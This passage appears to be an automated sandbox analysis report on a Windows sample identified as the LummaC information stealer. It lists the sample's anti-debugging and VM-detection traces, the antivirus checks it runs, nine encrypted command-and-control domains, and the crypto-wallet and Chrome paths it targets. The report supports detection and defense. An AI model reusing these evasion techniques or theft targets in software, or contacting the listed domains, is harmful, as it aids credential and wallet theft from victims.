Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B067F second address: 53B0710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F768C6F810Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov cx, A657h 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F768C6F810Ah 0x0000001f push eax 0x00000020 jmp 00007F768C6F810Bh 0x00000025 nop 0x00000026 jmp 00007F768C6F8116h 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F768C6F8110h 0x00000031 push eax 0x00000032 jmp 00007F768C6F810Bh 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 call 00007F768C6F8114h 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0710 second address: 53B072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 call 00007F768C6F6327h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0008 second address: 53B000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B000C second address: 53B0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0012 second address: 53B005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007F768C6F810Fh 0x00000015 and eax, 57C9013Eh 0x0000001b jmp 00007F768C6F8119h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B005E second address: 53B0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0064 second address: 53B0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0068 second address: 53B0105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F768C6F6326h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cl, 86h 0x00000013 mov ebx, 4C635DACh 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007F768C6F6325h 0x0000001f jmp 00007F768C6F631Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F768C6F6326h 0x0000002d xchg eax, ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov di, 5640h 0x00000035 pushfd 0x00000036 jmp 00007F768C6F6329h 0x0000003b or cl, 00000046h 0x0000003e jmp 00007F768C6F6321h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0105 second address: 53B0163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F768C6F8117h 0x00000011 sbb ch, 0000002Eh 0x00000014 jmp 00007F768C6F8119h 0x00000019 popfd 0x0000001a call 00007F768C6F8110h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B020E second address: 53B0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F768C6F6324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0226 second address: 53B024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, ch 0x0000000e call 00007F768C6F8115h 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0BC0 second address: 53B0BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0BC7 second address: 53B0BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0BCD second address: 53B0C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F768C6F6329h 0x00000012 or cx, 43F6h 0x00000017 jmp 00007F768C6F6321h 0x0000001c popfd 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C0E second address: 53B0C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F768C6F810Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F768C6F8116h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F768C6F810Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C4F second address: 53B0C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C53 second address: 53B0C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C59 second address: 53B0C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C5F second address: 53B0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C63 second address: 53B0C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75C7459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F768C6F631Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C84 second address: 53B0C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0C8A second address: 53B0CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F76FCF54079h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F768C6F6327h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0CBB second address: 53B0CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5ADF080Ah 0x00000008 pushfd 0x00000009 jmp 00007F768C6F810Bh 0x0000000e or eax, 09DD2EAEh 0x00000014 jmp 00007F768C6F8119h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0CF9 second address: 53B0CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0CFD second address: 53B0D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0D58 second address: 53B0DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 17E7h 0x00000007 call 00007F768C6F631Ch 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 05677A2Ah 0x00000017 jmp 00007F768C6F6321h 0x0000001c call 00007F76FCF5B101h 0x00000021 push 75C12B70h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov eax, dword ptr [esp+10h] 0x00000031 mov dword ptr [esp+10h], ebp 0x00000035 lea ebp, dword ptr [esp+10h] 0x00000039 sub esp, eax 0x0000003b push ebx 0x0000003c push esi 0x0000003d push edi 0x0000003e mov eax, dword ptr [75C74538h] 0x00000043 xor dword ptr [ebp-04h], eax 0x00000046 xor eax, ebp 0x00000048 push eax 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c push dword ptr [ebp-08h] 0x0000004f mov eax, dword ptr [ebp-04h] 0x00000052 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000059 mov dword ptr [ebp-08h], eax 0x0000005c lea eax, dword ptr [ebp-10h] 0x0000005f mov dword ptr fs:[00000000h], eax 0x00000065 ret 0x00000066 jmp 00007F768C6F631Eh 0x0000006b sub esi, esi 0x0000006d jmp 00007F768C6F6321h 0x00000072 mov dword ptr [ebp-1Ch], esi 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 pushfd 0x00000079 jmp 00007F768C6F6323h 0x0000007e jmp 00007F768C6F6323h 0x00000083 popfd 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0DDC second address: 53B0DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0DE2 second address: 53B0DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0A7A second address: 53C0A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0A8D second address: 53C0AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0AA6 second address: 53C0AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0AAC second address: 53C0AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0AB0 second address: 53C0AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0AB4 second address: 53C0B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov dx, ax 0x00000011 popad 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 mov dword ptr [esp], esi 0x00000018 pushad 0x00000019 push eax 0x0000001a call 00007F768C6F6327h 0x0000001f pop eax 0x00000020 pop edx 0x00000021 mov ax, C3B5h 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+0Ch] 0x00000029 pushad 0x0000002a mov di, ax 0x0000002d mov esi, 17552A69h 0x00000032 popad 0x00000033 test esi, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0B00 second address: 53C0B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 63E40E52h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0B0A second address: 53C0BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F76FCF43BA7h 0x0000000f pushad 0x00000010 call 00007F768C6F631Eh 0x00000015 push esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushfd 0x00000019 jmp 00007F768C6F6327h 0x0000001e or si, 385Eh 0x00000023 jmp 00007F768C6F6329h 0x00000028 popfd 0x00000029 popad 0x0000002a cmp dword ptr [75C7459Ch], 05h 0x00000031 pushad 0x00000032 jmp 00007F768C6F631Ch 0x00000037 movzx esi, bx 0x0000003a popad 0x0000003b je 00007F76FCF5BC1Fh 0x00000041 pushad 0x00000042 mov dx, 926Eh 0x00000046 push edi 0x00000047 pushfd 0x00000048 jmp 00007F768C6F6322h 0x0000004d add ax, 46B8h 0x00000052 jmp 00007F768C6F631Bh 0x00000057 popfd 0x00000058 pop esi 0x00000059 popad 0x0000005a push eax 0x0000005b pushad 0x0000005c movzx ecx, di 0x0000005f mov dl, 3Bh 0x00000061 popad 0x00000062 mov dword ptr [esp], esi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0C45 second address: 53C0C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edi 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Special instruction interceptor: First address: CE970E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Special instruction interceptor: First address: B48B4A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Special instruction interceptor: First address: CE7E96 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe TID: 6864	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe TID: 4928	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe TID: 5724	Thread sleep time: -270000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Last function: Thread delayed

Source: SFtDA07UDr.exe, 00000000.00000002.2463260674.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.0000000001689000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: SFtDA07UDr.exe, 00000000.00000002.2463260674.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: NTICE
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: SICE
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: bashfulacid.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tentabatte.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: curverpluch.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: talkynicer.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: shapestickyr.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: manyrestro.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: slipperyloo.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wordyfindy.lat
Source: SFtDA07UDr.exe, 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: observerfry.lat

Source: SFtDA07UDr.exe, 00000000.00000002.2463471929.0000000000D11000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1980257379.0000000001740000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SFtDA07UDr.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: SFtDA07UDr.exe, 00000000.00000003.2045876549.0000000001720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SFtDA07UDr.exe, 00000000.00000003.2045876549.0000000001720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: SFtDA07UDr.exe, 00000000.00000003.2045876549.0000000001720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SFtDA07UDr.exe, 00000000.00000003.2045876549.0000000001720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
